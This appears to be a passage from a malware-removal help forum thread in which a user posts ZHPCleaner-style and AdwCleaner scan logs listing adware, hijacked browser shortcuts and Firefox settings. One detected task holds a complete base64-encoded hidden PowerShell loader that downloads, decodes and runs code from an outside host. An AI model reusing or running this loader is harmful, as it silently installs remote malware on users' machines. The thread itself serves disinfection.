    [Mal.Powershell] \{0E790447-0C04-7A78-0F11-787A0D0A110F} -- C:\Windows\system32\WindowsPowershell\v1.0\powershell.exe (-nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGYAaQBuAGgAbwBvAG0AZQAuAGkAbgBmAG8ALwB1AC8APwBhAD0AdQBDAEoATgBGAFEAQwBQAC0AeAA1AFcAbwBuAEwALQBXAEwAbQBEADgAZwBPAGYAbgBjAHoAVwBuAE0AZgBVADQARgA1AEkAUQBiAFIANwBPAE0AMQAzAHkAdgAyAHkAbwBfAGYARQBJAGEAbgBvAEoARQAtAHoAVwBKAGIAUwB5AFIAYgBNAFYAawBMAGIAdgA2AFQAYQBlADkAbQBUAGcATwBZAEgAQgBpAGoALQB3AG8AVwBiAEEAbQAtAGwARQA4AGIARgB2AFoAOABVAEQAcwAtAE8ANgBBAHYAMgA5AF8AYgBJAHIANABpAEIARwBJADEAQgB4AFAAVAAtAFYASABXAHoAbwA4AHgAVQBQAHQAUgBLAFQAcAA5AHIANQAxAFoAUwB4AHYAUgAyAGYAMABRAEQAVwB1AG4ANABNADIAQQBDAGoALQBvAEMATQBKAHUAMQBlAGwAXwBBAHMAeABJAEQAZgBXADcAZQBuAGoAcwA1ADkANQBiAGcAOQBXADIARABiAEIAcQB6AHYAUABMAFUAZABoAGIAUgBGAGEAMQBPAEcAbABfADkAUgB2AGsAOQAtADAASAAwAGMAQgBEAGoAcABnAEYAVwBNAHMANABTADYAdABaADIAagBjADYATwBkAHIAXwAtAFIANAAzADYAcgAtAHYAawAyAFMASwBLADUAQQBsAEUAcABqAGIAaQBxADIAUABoAFgAQwBMAEwAQgBnAG4AUwBlAFAANgBNAF8ANgA0AGEARgBfAEsARwBfADgAWQB3AFkAdwA1AGMANQBiAEEAXwBoAHIAZgB6AFMAYQBmAGIANwBaADQAUQBEAHoAUABJAEwAbQBvAGkARQAxAEcAcQBnAGQAQgBlAEwAcQBYAFkATwBXAFgANABTAEIATwBlAGQAVABrADUAVgBDADQARwB3ADIAQgBlAFAAMQBjAGIAYwAwAFQAOAAxADgAYQBsAFUAUQBKAHQAZAByAGYATgB0ADAAaAAzAG8AMwBBAHEAYQA5AF8ANgByADIAZgBEAEsAeABSADQARQBwAFoANABPAGsAWQBHAGYATgBYAFkAWABBAGUAVABVAHQAaAAtAGkAcwBMAGEAVwBQADMAOQB1AE0AYwBuADgAWgBkAE4AWAByAFMASQB0AHAAdwBRAGwARABYAFoATgAxAGEAMwBEAGIAVQBHAGIAeQBaADcARQB6AFUASQBIAEMAdABLADcAVgBIAHUARABwAGsAWQB2AFoAQQA3AEUAaABXAHgAVABGAG0AUwA2AGQATwBvAEYAdwAwAFIASwBnAEgAOABJAGQAcQB2AHkAbQBIAGwASwBLAHoAQQAyAG4AdQBsAHQAbQBsAG4ANgBqAE4AcABCAGIAVgBzAFgAMQBNAEYAQgBGAFMAXwBYAFkAdwBPADYAVABwAFoAZgBkAEQAZABpADcAeABzAG0ARABJAEQAOQBqAFEAdABuAE0AawBqAE8AOQByAC0AYQB2AGYAZwA4AGsAaABjAHcAQQA2ADkASwA0AFIAZwBCADAANABEAFgAagBiAHkAVQBEAGoATwBCAFkAOQBjADcAYwBEAGwASwBwADYAeABvAGkAYwBiAGcARQBfAG0AXwBkAHUAUQBuADMAdQBnAGcAWgBnAEMAXwBDAGYARwB5AEUANQBRADcAeQAyAFQAUgAwAEwATQBqAHQAZABHAEkAUQAtAHkAawA3AFgAaQAyAHAAcwBwAHkASwA0AHYAZgAxAG8ASwBSAHgAbABTAG0AZgB3AEQAdAAwAEgANwBJAFoANABmAFIATgBDADQAZQB6AFUATwA4AF8AYQB1AGgAbABNAE0ALQB6AEIASQB0AG4AcgBSAFEAdwB3ADEAVAA2AGEAUwBGAEkAbABIAFIAUgBwAGIATgBjAC0AbwBxAEQARQBjAGUAYwBDAG8AMQBOAHYAcwBFADQAbABwAHEAZgB1AEsAVQA4AFAAcwA2AEwAMABKAEoAZgBSAEcAWQBVAHQARgB4AGoAMABjAGUAQgBPAEQAQQB4AEQAcgBRAFIAQwBwAEEAVgA5AGMANgBNAFEAeABHAEsAagBZAHEAcgBBAEIAbQBjAGMANgBHADEANQBwAE4ANQA0AFgAdwBzAHgAZQBuAG4AVgBZAFAASABSADAANgBYAFcAOABaAG0ATgAtADQAYwAwAFQANwBiAG0ANABnAHMAOAB4AEMAUQBRAHAAOAB6AGUAagBCADkARQBNAFgANwAyAHgAUwBZAEIAcwBXAC0AYQBpADQAcgBKAEIAegB2ADIAVgA3AFoANgBvAGcAYgByAFUAbgBqAHoAQgA2AEwASgBRAFAAbQBTADYAbgBPAEgANABUAE8AJgBjAD0AUwAwAFUAeABqAGUATwBmAG4AbAAxADYANwBQAFoARwB3AE0AagBOAHkAUABIAGkAcgBpAGIAcQBIADkANgBZAFAAVgBjAHYALQBsAGoATwBZAFMATABPAEgAcwB4AGMAQgBsADgAdgBIAE4ANAA5AGUAcwBnAGYATwBfAGIAbQBQAHQARgBXAFQAVgA1AHAAYQBDAFQAdgAxAGIAOQBiAEUAcgBNAF8AdQBBAEgAMQBfAEIAawBvADAAQwA1AGEAcQByAFQAOQBQAHIAOABvAEIAQgBOAEQAVABJAEsAdABqAHgAWQA2ADgAMwByAFUAdgBFAGMAbgA4AHMAeABVAEIAVgB5AFAARQA3ADgAQwA5AEMAUwA4AEcAdwBWAFcAWgAwAG8AegBOAGQAVgA4ADMAdgA4AGMAZgBjADAAYwBGAGQAdQA0AHgATABrAHkARQBaAFgAMQAzAGsANwAzAE0AawBSADIAegBzADQAeABGAHgAYgBFAFIAXwBSAGQAaQBSAEMAagBUAFkAYQAxAHMAVABhADIANABfAFoANABzAG8AcQA4AFIATgB5AEcAMwBoAEkAXwB5AGIATgBjAHMASABnAEMAOQAzAHgAaQBHAFEAWABxADgAMQBrAEYAMABOAHQANgBCAG0ASAB0AHgAYwBjAFoANgA2AHAAcQAyAEYAZgAxAHUAYwBmAE0AdQBfAFQAbgA0AF8ANQBQAFYAMABNADgAMABaAHYANgBSAFUANwBkAG8AWgAzAGQAWAB6AHoATwAzAGQAcQBLAFEANQAwAE4AVgBQAGsAQQBrAFYAZQBMAHIAUwBGADgANAA5AHAAYgAyAG0AWgBzAEsAbgBLAGEAQQBzAHEAdwBqAEoAQQBFAGwAMAAtAGgANABKAGQAbwBPADgAagBFADgAUAB6AHEAMgBpAGYAWQBhADEATgBBADUAVQBXAEsAZwBWADQARABWAEsAVQBRAGgAYwAtAEsAMABUAHAATgBTAGkARwBlAGsAMABYAGcAOQA2ADYAVABLAE4ANgBwAEwATwAzAEwAZgA1AG4ANwA2AHEAaABLAHUAZgBLAGoAQgBPAHEAcwBJADcAbQAxAG4AUwBLAEkAbgBjAHAAYQBSAE8AWQBHAF8AWQBXAHMAMwBpAFQASwA5AEEAbQA1AFAAUQBmAE0AcgA5AFUAaABoAFYAcwBCAGQAegBSAG0AdQB1AEEAcgBnAFoASwAxAE8ARABwADUAMwBCADUAaQBLADMASwB6ADQAcQBRAGQAcAA1AHIAWABTAEUAYwB1AGUAQQBzAEkAbgBrADIAQgB3AFQAbQBJAGoATwBvAFUASQBrAHMAeABJAEoAdABVAHEAcgBSAEsATABGADAAeABxAHAAbQB3AHcAdwA5AGsAYQBRADIAVgBHAHkANQBnAFUAdgB5ADkANgA1AFYASgAyAHgAeABHADQAagBRADYAawA5AGMAVwB1ADkALQBUAHcANwBnAG4AYgBXAC0AMABfAFUANwBBAEUAegBsAHEAZgBTAFMAUQBDADcAYwBhAHMANwBxAFIANgBtADQAawBMADMAbgBVAGEAbwBfAFcAaQBVAHAASQBRAHoAaAA1AEgANQB3AFcAZgBOADgAUwBkAE0AMAAzAFoAWQAzAGMALQBKAHUANwBKADAAYQBpAEgAcQBJAG0AcQBUAHAAYwAtAEQAVwBVAEoAcQBOAFIATAA3ADMAUgA5AHMAcAB6AGUAeQBRAEEAcQBSAE8ATwBzAG4AbgByAEcAOQBoAHgASABaAEUATgB4AG8AdAA4AFUAbAByAHkAQwBmAG4AMgBZAFcAbQAtAHMANABEAC0AYgBEAHUAOAB5AHYATwBwAE4AUgBWAGwAWQBtAEUAVABsAFEAaQBvAGwAZQBEAEcAYgBmAHAAMgBJAG0ATAA2AFIAMABJAHoAcABzADAAUABQAFgAdQB2AEQARQBfAHkATQBVADkAbgAtAGcATQBBAEMALQBKAEsAUwBMAHYAbQBQAGQAZAA3AGcAYwB1AHQAcABUADcANgBYAFgAaQB3AHAAawBHAGQASgBiAHEAZQBDAEMANABhAGoALQBrADYAegAzADAAWABuAGEAZAAyAGQAMgBrAEQAVABqAG8AVABQADcARQA1AHAAdwBDAGkAcgBfAG8AYQB0AGYAbQBYADQAbABMAGMANwB3AHUANABHAHQAMgBPAEcAOAA3AFEAUAA1ADkAawBQAHQAVgBkAEcAYwBqAEwAOABnAEsAUABnAEkAaABIAFIAZQB2ADcAWAB1AEgAdQBXAHYATgBfAHYAVQBoAHUAcABsADYAZQA0AEYAdgBYAGQARwBUAC0ARQA0AFgAZwBiAE8AawA5AFMARgB5AGsASwA1AFMASQBQAHQAeABwADQALQBLAEEAagB4AHgASgBKAF8AWABGAGoAeABpAHIAVwA0AEoAegBCAEsARQBtAG8AMQA5AFkAVwA0AHcANwB1AEoAVABQAFoAbgBxADEARQBtACYAcgA9ADMANwA4ADYANwAxADgAOAAyADQANQA3ADYAMQAzADUAMwA2ADQAIgA7ACQAcwB0AHMAawA9ACIAewAwAEUANwA5ADAANAA0ADcALQAwAEMAMAA0AC0ANwBBADcAOAAtADAARgAxADEALQA3ADgANwBBADAARAAwAEEAMQAxADAARgB9ACIAOwAkAHAAcgBpAGQAPQAiAE8AbgBlAFMAeQBzAHQAZQBtAEMAYQByAGUAIgA7ACQAaQBuAGkAZAA9ACIASQBSAEYAUQBPAEsASABPACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA) -> Found

    ¤¤¤ Files : 54 ¤¤¤
    [PUP.Gen0][Folder] C:\ProgramData\ChelfNotify -> Found
    [PUP.Gen1][Folder] C:\ProgramData\Tencent -> Found
    [PUP.Gen0][Folder] C:\ProgramData\WinSAPSvc -> Found
    [Adw.Elex][Folder] C:\ProgramData\wintools -> Found
    [Adw.FakeBro][File] C:\Users\Public\Desktop\Internet Explorer.lnk [LNK@] C:\PROGRA~2\Explorer\iexplore.exe http://www.startpageing123.com/?typ...1&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [PUP.Ghokswa][File] C:\Users\Public\Desktop\Mozilla Firefox.lnk [LNK@] C:\PROGRA~2\Firefox\Firefox.exe http://www.startpageing123.com/?typ...1&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [Adw.FakeBro][File] C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk [LNK@] C:\PROGRA~2\Explorer\iexplore.exe http://www.mylucky123.com/?type=sc&...2&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [Hj.Shortcut][File] C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk [LNK@] C:\PROGRA~1\INTERN~1\iexplore.exe http://www.mylucky123.com/?type=sc&...2&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [Adw.FakeBro][File] C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Internet Explorer.lnk [LNK@] C:\PROGRA~2\Explorer\iexplore.exe http://www.mylucky123.com/?type=sc&...2&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [PUP.Ghokswa][File] C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk [LNK@] C:\PROGRA~2\Firefox\Firefox.exe http://www.startpageing123.com/?typ...1&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [Hj.Shortcut][File] C:\Users\User\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\?ozilla ?ire?ox.lnk [LNK@] C:\PROGRA~2\MOZILL~1\firefox.exe http://www.mylucky123.com/?type=sc&...2&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [PUP.Gen0][File] C:\Windows\SECOH-QAD.exe -> Found
    [PUP.Yac][File] C:\Windows\System32\drivers\iSafeNetFilter.sys -> Found
    [PUP.AMule][Folder] C:\Users\User\AppData\Roaming\aMule -> Found
    [PUP.Gen1][Folder] C:\Users\User\AppData\Roaming\Elex-tech -> Found
    [PUP.Ghokswa][Folder] C:\Users\User\AppData\Roaming\Firefox -> Found
    [Adw.Elex][Folder] C:\Users\User\AppData\Roaming\Kyubey -> Found
    [PUP.Gen1][Folder] C:\Users\User\AppData\Roaming\RPEng -> Found
    [PUP.Gen0][Folder] C:\Users\User\AppData\Roaming\WinSAPSvc -> Found
    [Adw.Elex][Folder] C:\Users\User\AppData\Roaming\WinSnare -> Found
    [PUP.Gen1][Folder] C:\Users\User\AppData\Roaming\WinZiper -> Found
    [PUP.Ghokswa][Folder] C:\Users\User\AppData\Local\Firefox -> Found
    [Tr.Eroyee][File] C:\Users\User\AppData\Local\Temp\lgE2D94.tmp\Kyubey.exe -> Found
    [Tr.Eroyee][File] C:\Users\User\AppData\Local\Temp\lgEEF7A.tmp\Kyubey.exe -> Found
    [PUP.Gen0][Folder] C:\ProgramData\ChelfNotify -> Found
    [PUP.QRss][Folder] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\BikaQ -> Found
    [PUP.Ghokswa][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk [LNK@] C:\PROGRA~2\Firefox\Firefox.exe http://www.startpageing123.com/?typ...1&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [PUP.Gen0|PUP.Gen1][File] C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinZip\Uninstall.lnk [LNK@] C:\PROGRA~2\WINZIP~1\WZUNIN~1.EXE -> Found
    [PUP.Gen1][Folder] C:\ProgramData\Tencent -> Found
    [PUP.Gen0][Folder] C:\ProgramData\WinSAPSvc -> Found
    [Adw.Elex][Folder] C:\ProgramData\wintools -> Found
    [PUP.AMule][Folder] C:\Program Files (x86)\amuleC2 -> Found
    [PUP.AMule][Folder] C:\Program Files (x86)\amuleCexx -> Found
    [PUP.AMule|PUP.Amulell][Folder] C:\Program Files (x86)\amulell -> Found
    [PUP.QRss][Folder] C:\Program Files (x86)\BikaQRssReader -> Found
    [PUP.Bili][Folder] C:\Program Files (x86)\bilibili -> Found
    [PUP.Gen1][Folder] C:\Program Files (x86)\Elex-tech -> Found
    [Adw.FakeBro][Folder] C:\Program Files (x86)\Explorer -> Found
    [PUP.Ghokswa][Folder] C:\Program Files (x86)\Firefox -> Found
    [Adw.Elex][File] C:\Program Files (x86)\Gub\GubZL.dll -> Found
    [Adw.Elex][File] C:\Program Files (x86)\Gubed\GubedZL.dll -> Found
    [PUP.Gubed][Folder] C:\Program Files (x86)\Gubed_WMI -> Found
    [PUP.Gen0][Folder] C:\Program Files (x86)\InterHop -> Found
    [PUP.Gen3][File] C:\Program Files (x86)\Mozilla Firefox\browser\searchplugins\GoSearch.xml -> Found
    [Adw.Trotux][Folder] C:\Program Files (x86)\Tafleclwther -> Found
    [PUP.WinArcher|PUP.Gen0][Folder] C:\Program Files (x86)\WinArcher -> Found
    [PUP.Gen0][Folder] C:\Program Files (x86)\WinSaber -> Found
    [PUP.Gen0|PUP.Gen1][Folder] C:\Program Files (x86)\WinZipper -> Found
    [Adw.FakeBro][File] C:\Users\Public\Desktop\Internet Explorer.lnk [LNK@] C:\PROGRA~2\Explorer\iexplore.exe http://www.startpageing123.com/?typ...1&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [PUP.Ghokswa][File] C:\Users\Public\Desktop\Mozilla Firefox.lnk [LNK@] C:\PROGRA~2\Firefox\Firefox.exe http://www.startpageing123.com/?typ...1&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found
    [PUP.Amisites][File] C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\xt4h78mw.default\searchplugins\amisites.xml -> Found
    [PUP.Gen3][File] C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\xt4h78mw.default\searchplugins\Palikan.xml -> Found
    [PUP.StartPageIng][File] C:\Users\User\AppData\Roaming\Mozilla\Firefox\Profiles\xt4h78mw.default\searchplugins\startpageing123.xml -> Found
    [Adw.FakeBro][File] C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk [LNK@] C:\PROGRA~2\Explorer\iexplore.exe http://www.mylucky123.com/?type=sc&...2&uid=TOSHIBAXMQ01ABF050_Z4LKC79YTXXZ4LKC79YT -> Found

    ¤¤¤ WMI : 0 ¤¤¤

    ¤¤¤ Hosts File : 0 ¤¤¤

    ¤¤¤ Antirootkit : 0 (Driver: Loaded) ¤¤¤

    ¤¤¤ Web browsers : 5 ¤¤¤
    [PUM.HomePage][Firefox:Config] xt4h78mw.default : user_pref("browser.startup.homepage", "http://www.luckysearch123.com?type=...&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"); -> Found
    [PUM.NewTab][Firefox:Config] xt4h78mw.default : user_pref("browser.newtab.url", "http://www.luckysearch123.com?type=...&z=049c73437918e7fc6fe3dfegaz7b9m8o9o9t2m2qdg"); -> Found
    [PUM.SearchEngine][Firefox:Config] xt4h78mw.default : user_pref("browser.search.selectedEngine", "nice"); -> Found
    [PUM.SearchEngine][Firefox:Config] xt4h78mw.default : user_pref("browser.search.defaultenginename", "nice"); -> Found
    [PUM.SearchEngine][Firefox:Config] xt4h78mw.default : user_pref("browser.search.searchengine.url", "http://www.luckysearch123.com/searc...7fc6fe3dfegaz7b9m8o9o9t2m2qdg&q={searchTerms}"); -> Found

    ¤¤¤ MBR Check : ¤¤¤
    +++++ PhysicalDrive0: TOSHIBA MQ01ABF050 +++++
    --- User ---
    [MBR] 66cf109dc3693310c623ece1293456ef
    [BSP] fd87b8d8802a5f0544f6f6feb573659c : Empty|VT.Unknown MBR Code
    Partition table:
    0 - [MAN-MOUNT] EFI system partition | Offset (sectors): 2048 | Size: 100 MB
    1 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 206848 | Size: 900 MB
    2 - [MAN-MOUNT] Microsoft reserved partition | Offset (sectors): 2050048 | Size: 128 MB
    3 - Basic data partition | Offset (sectors): 2312192 | Size: 190774 MB
    4 - Basic data partition | Offset (sectors): 393017344 | Size: 269667 MB
    5 - [SYSTEM][MAN-MOUNT] Basic data partition | Offset (sectors): 945295360 | Size: 15370 MB
    User = LL1 ... OK
    User = LL2 ... OK

    +++++ PhysicalDrive1: Generic USB Flash Disk USB Device +++++
    --- User ---
    [MBR] 7585ee7e24514ad66055ebd0066ae34b
    [BSP] 7208b105e661849d4a48c279d3177d8d : Legit.Unknown MBR Code
    Partition table:
    0 - [ACTIVE] FAT16-LBA (0xe) [VISIBLE] Offset (sectors): 63 | Size: 37 MB
    User = LL1 ... OK
    Error reading LL2 MBR! ([32] The request is not supported. )

    +++++ PhysicalDrive2: Generic USB Flash Disk USB Device +++++
    --- User ---
    [MBR] 3c9e59f19b253ef396ba517d4a32b1e2
    [BSP] d70d9c1031359407e6a8ce0be4028301 : Unknown|VT.Unknown MBR Code
    Partition table:
    0 - [XXXXXX] UNKNOWN (0x68) [VISIBLE] Offset (sectors): 1936028272 | Size: 904228 MB
    1 - [XXXXXX] UNKNOWN (0x79) [VISIBLE] Offset (sectors): 1330184192 | Size: 263172 MB
    2 - [XXXXXX] DISKMNG (0x53) [VISIBLE] Offset (sectors): 538989391 | Size: 682794 MB
    3 - [XXXXXX] UNKNOWN (0x49) [VISIBLE] Offset (sectors): 1394627663 | Size: 10 MB
    User = LL1 ... OK
    Error reading LL2 MBR! ([32] The request is not supported. )
     
  12. 2017/03/15
    scgoh123

    scgoh123 Well-Known Member Thread Starter

    Joined:
    2009/09/04
    Messages:
    352
    Likes Received:
    2
    Trophy Points:
    233
    Location:
    Singapore
    Computer Experience:
    Still Improving
    # AdwCleaner v6.044 - Logfile created 15/03/2017 at 14:04:22
    # Updated on 28/02/2017 by Malwarebytes
    # Database : 2017-03-15.1 [Local]
    # Operating System : Windows 8.1 Single Language (X64)
    # Username : User - ASUS
    # Running from : F:\AdwCleaner.exe
    # Mode: Clean
    # Support : Customer Support & Help Center



    ***** [ Services ] *****



    ***** [ Folders ] *****

    [-] Folder deleted: C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\Tencent
    [-] Folder deleted: C:\Users\User\AppData\Roaming\Profiles\tst8dpyk.default


    ***** [ Files ] *****

    [-] File deleted: C:\Windows\SysNative\log\iSafeKrnlCall.log
    [-] File deleted: C:\Windows\SysNative\drivers\iSafeKrnlBoot.sys
    [-] File deleted: C:\Program Files (x86)\settings.dat
    [-] File deleted: C:\Users\Public\Documents\cfg.ini
    [-] File deleted: C:\Users\Public\Documents\cc.ini
    [-] File deleted: C:\Users\Public\Documents\temp.dat
    [-] File deleted: C:\Users\Public\Documents\report.dat
